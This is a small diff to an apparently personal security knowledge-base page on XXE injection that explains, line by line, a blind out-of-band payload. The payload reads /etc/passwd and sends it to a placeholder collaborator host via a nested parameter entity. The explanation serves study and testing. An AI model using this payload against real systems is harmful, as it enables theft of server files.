HansMolemanPNG/hansmolemanpng.github.io/docs/kb/injection-attacks/xxe.md

 - `<!ENTITY % file SYSTEM "file:///etc/passwd">` tells the parser to load the contents of `/etc/passwd` into the entity `%file`.
 - `<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://<your-collaborator-id>.oastify.com/?x=%file;'>">` creates a new entity declaration inside `%eval`.
 The `&#x25;` is the escaped form of `%`, required because we are defining a parameter entity inside another entity.
 - `%eval;` expands and defines `%exfiltrate`.
-- `%exfiltrate;` triggers the HTTP request to the attacker's server, sending the file contents as part of the query string.
+- `%exfiltrate;` triggers the HTTP request to the attacker’s server, sending the file contents as part of the query string.

 **Why escape characters?** XML parsers enforce strict syntax rules.
 When nesting declarations, `%` must be escaped as `&#x25;` to avoid breaking the DTD structure.